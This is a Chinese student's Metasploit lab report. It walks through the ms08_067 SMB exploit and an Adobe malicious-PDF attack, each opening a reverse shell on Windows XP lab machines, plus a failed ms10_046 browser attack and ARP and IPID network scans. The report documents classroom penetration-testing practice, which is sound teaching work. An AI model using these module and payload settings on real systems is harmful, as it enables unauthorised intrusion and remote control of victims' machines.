20155205 郝博雅 Exp5 MSF基础应用

时间:2023-01-03 14:52:49

20155205 郝博雅 Exp5 MSF基础应用

一、实验目标

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1.一个主动攻击实践,如ms08_067; (1分)

    1. 一个针对浏览器的攻击,如ms11_050;(1分)

    2. 一个针对客户端的攻击,如Adobe;(1分)

    3. 成功应用任何一个辅助模块。(0.5分)

基础问题回答:用自己的话解释什么是exploit,payload,encode?

  • exploit相当于一个载体,把攻击代码运送到耙机中;payload相当于shellcode;encode一是为了避免payload中出现坏字符,从而影响payload的功能,二是为了实现免杀。

二、实验内容

主动攻击:ms08_067漏洞攻击

靶机: windows XP SP3(English)

攻击机:kali

  • 输入msfconsole进入控制台,输入search ms08_067指令查询一下针对该漏洞可以运用的攻击模块:

20155205 郝博雅 Exp5 MSF基础应用

  • 输入use exploit/windows/smb/ms08_067_netapi使用该模块:

20155205 郝博雅 Exp5 MSF基础应用

  • 使用show payloads查看可以供我们使用的payload并找到一个可用的攻击载荷:

20155205 郝博雅 Exp5 MSF基础应用

  • set payload generic/shell_reverse_tcp即tcp反向回连设置payload

  • 使用指令show options查看我们需要设置的参数,需要设置一个RHOST(靶机的IP地址)和一个LHOST(攻击机的IP地址)。并且看到target是0,即自动选择目标系统类型,就不用再设置了。

20155205 郝博雅 Exp5 MSF基础应用

  • 使用set LHOST 192.168.206.129set LPORT 5205设置本机地址和端口,使用set RHOST 192.168.206.135 设置耙机地址,使用show options查看设置结果:

20155205 郝博雅 Exp5 MSF基础应用

  • 接着使用exploit指令开始攻击,出现了一个错误:

20155205 郝博雅 Exp5 MSF基础应用

  • 关闭XP的防火墙:

20155205 郝博雅 Exp5 MSF基础应用

  • 攻击成功,获取了耙机的shell:

20155205 郝博雅 Exp5 MSF基础应用

对浏览器攻击:ms10_046漏洞攻击

攻击机:kali

靶机:windowsXP Professional sp2

IE:8.0

  • search ms10_046指令查看可以运用的攻击模块,进入模块后将SRVHOST和LHOST填攻击机的IP地址,在ip浏览器中输入生成的URL后会出错:

20155205 郝博雅 Exp5 MSF基础应用

  • 这个错误很多人都遇到了,也没有解决,算一个失败的例子吧,不过老师不是说攻击百分之九十都是失败么

对Adobe的漏洞攻击:adobe_toolbutton

攻击机:kali

靶机:windowsXP Professional sp2

Adobe版本:9.3

  • 先输入search adobe查询针对adobe攻击的模块,使用use exploit/windows/fileformat/adobe_toolbutton,使用set payload windows/meterpreter/reverse_tcp设置payload

20155205 郝博雅 Exp5 MSF基础应用

20155205 郝博雅 Exp5 MSF基础应用

  • show options看一下需要设置的参数

20155205 郝博雅 Exp5 MSF基础应用

  • 设置好参数后输入exploit开始攻击,可以看到生成了pdf文件。

20155205 郝博雅 Exp5 MSF基础应用

  • 将pdf文件拷到xp里,在kali上输入back退出当前模块,进入监听模块
  • 在靶机上打开pdf文件

20155205 郝博雅 Exp5 MSF基础应用

  • 可以看到攻击成功,获取了xp的shell

20155205 郝博雅 Exp5 MSF基础应用

  • 强行关闭了pdf文件后,可以看到监听的会话被关闭了。

20155205 郝博雅 Exp5 MSF基础应用

辅助模块的应用1:arp_sweep

  • 先使用show auxiliary查看w所有的辅助模块以及他们的用途,在metasploit中,辅助模块的用途非常广泛,他们可以是扫描器/拒绝服务攻击工具/fuzz测试器,以及其他类型的工具。

  • 模块实在是太多了,找了很多个但搜索了一下做起来都比较困难,因此使用show scanner找一个比较简单一点的,最后选择了arp_sweep。可以参考(MSF内网渗透 扫描模块

  • arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机进行扫描。进入模块后查询一下参数

msf > use auxiliary/scanner/discovery/arp_sweep   ---进入arp_sweep 模块
msf auxiliary(arp_sweep) > show options ---查询模块参数

之后进行参数设置

msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24--用set进行hosts主机段设置
RHOSTS => 10.10.10.0/24
msf auxiliary(arp_sweep) > set THREADS 50 --加快扫描速度
THREADS => 50
msf auxiliary(arp_sweep) > run --执行run进行扫描
  • 因为我只开了一个虚拟机,所以只扫到了一个活跃机。

20155205 郝博雅 Exp5 MSF基础应用

  • 但里面那个 10.43.32.1 appears to be up (USC INFORMATION SCIENCES INST).是啥呢??查了一下后面英文的意思是加利福尼亚大学洛杉矶分校。。。

辅助模块的应用2:ipidseq

  • 功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
  • 老规矩,先search ipidseq后选择相应模块,查看需要设置的参数:

20155205 郝博雅 Exp5 MSF基础应用

  • 设置参数后exploit,扫描成功

20155205 郝博雅 Exp5 MSF基础应用

  • 还可以扫描一个网段,因为等待时间太长了只截了部分结果:

20155205 郝博雅 Exp5 MSF基础应用

db_autopwn实战

20155205 郝博雅 Exp5 MSF基础应用

20155205 郝博雅 Exp5 MSF基础应用